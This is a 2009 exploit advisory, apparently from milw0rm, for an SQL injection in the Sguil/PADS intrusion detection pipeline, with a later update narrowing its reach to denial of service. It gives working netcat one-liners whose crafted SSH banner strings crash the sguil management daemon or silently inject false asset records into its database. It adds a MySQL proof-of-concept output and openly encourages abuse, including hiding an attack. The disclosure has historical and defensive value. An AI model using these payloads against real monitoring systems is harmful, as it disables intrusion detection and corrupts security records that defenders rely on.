81 lines
No EOL
4.9 KiB
Text
81 lines
No EOL
4.9 KiB
Text
Sguil/PADS Denial of Service exploit
|
|
by Ataraxia (Benjamin Rose)
|
|
Public announcement made 7/15/09.
|
|
|
|
Please visit http://allmybase.com/ (my blog) for more up-to-date
|
|
information, and a quick patch.
|
|
|
|
More in-depth article available at: http://allmybase.com/?p=72
|
|
|
|
This more in-depth article does include additional details and
|
|
the actual code that is being exploited, if you're interested...
|
|
|
|
##########################################################################
|
|
UPDATE 7/17/09 @ 14:41:
|
|
In speaking with the creators of the sguil software, it seems that
|
|
I have greatly overestimated the reach of this bug. I had assumed that
|
|
it would be possible to run multiple SQL commands within a single TCL
|
|
mysqlexec() statement, an assumption that now seems incorrect. This means
|
|
that, at best, this hole becomes a denial of service attack that could
|
|
inject incorrect data into the sguil database, and/or kill the sguil
|
|
daemon, a noisy operation. My apologies for this initial overzealousness.
|
|
##########################################################################
|
|
|
|
ORIGINAL POST, UNMODIFIED:
|
|
This exploit has the ability to render any Intrusion Detection
|
|
System utilizing the sguil monitoring useless. At the lowest level,
|
|
you can kill the master logging daemon that collates the data into
|
|
a MySQL database. I've also been able to inject random and useless
|
|
data into the MySQL database, which opens the door for an obfuscation
|
|
of an attack, or a flat-out denial of service attack. There also exists
|
|
the possibility of dropping the database altogether, though I was not
|
|
able to make this happen during my preliminary testing of the attack.
|
|
|
|
The sguil sensor boxes report back to a sguil daemon on a management server,
|
|
which in turn puts the data received into a MySQL database. The sensor
|
|
collects data from many sensor agents, the most popular ones including snort
|
|
and sancp. Since snort is the de-facto standard NIDS, sguil is found in a lot
|
|
of places where there are mission-critical NIDS, making this a potent
|
|
vulnerability. The idea here is to craft a special packet containing a SQL
|
|
statement and send it across the wire, such that the sguil-agents will pick up
|
|
on it. We will exploit the Passive Asset Detection System (PADS) -> sguil
|
|
relationship, which will be monitoring for said banner packets. Thanks to the
|
|
availability of the netcat program, there is also no need for any programming
|
|
skill. Also, the attack can run on any port, so even an unprivileged user
|
|
could potentially run this attack.
|
|
|
|
Without further ado, here's the good stuff:
|
|
|
|
TO CRASH THE SERVER:
|
|
from a box that has its traffic monitored, run
|
|
echo “SSH-2.0-OpenSSH_1.4′,’deadbeefcafe’);–†| nc -l 7777
|
|
...and then telnet to port 7777 from another box. There will be a syntax
|
|
error in the sguil management daemon's SQL insert statement, and it will
|
|
crash rather ungracefully. This is highly noticable, so be careful!
|
|
|
|
TO INJECT DATA SILENTLY:
|
|
from a box that has its traffic monitored, run
|
|
echo “SSH-2.0-OpenSSH_1.4′,’deadbeefcafe’)–†| nc -l 8888
|
|
...and then telnet to port 8888 from another box. The difference here is the
|
|
semicolon in the statement. This will insert an asset into the SQL database as
|
|
ssh version 1.4, protocol 2.0. Obviously, you can have some fun with this ;-)
|
|
|
|
PROOF OF CONCEPT:
|
|
mysql> use sguildb;
|
|
Reading table information for completion of table and column names
|
|
You can turn off this feature to get a quicker startup with -A
|
|
|
|
Database changed
|
|
mysql> select * from pads where `hex_payload`=’deadbeefcafe’;
|
|
+————–+—–+———-+———————+————+———+——+———-+————-+————–+
|
|
| hostname | sid | asset_id | timestamp | ip | service | port | ip_proto | application | hex_payload |
|
|
+————–+—–+———-+———————+————+———+——+———-+————-+————–+
|
|
| [REMOVED] | 1 | 7 | 2009-06-08 14:28:02 | [REMOVED] | ssh | 1061 | 6 | OpenSSH 1.4 | deadbeefcafe |
|
|
+————–+—–+———-+———————+————+———+——+———-+————-+————–+
|
|
1 row in set (0.01 sec)
|
|
|
|
|
|
Note that you don't even need to put in legit hex into the attack for it to work. Bonus points
|
|
if you put in a hexadecimal message to the sysadmin that doesn't even contain legit hex.
|
|
|
|
# milw0rm.com [2009-07-17] |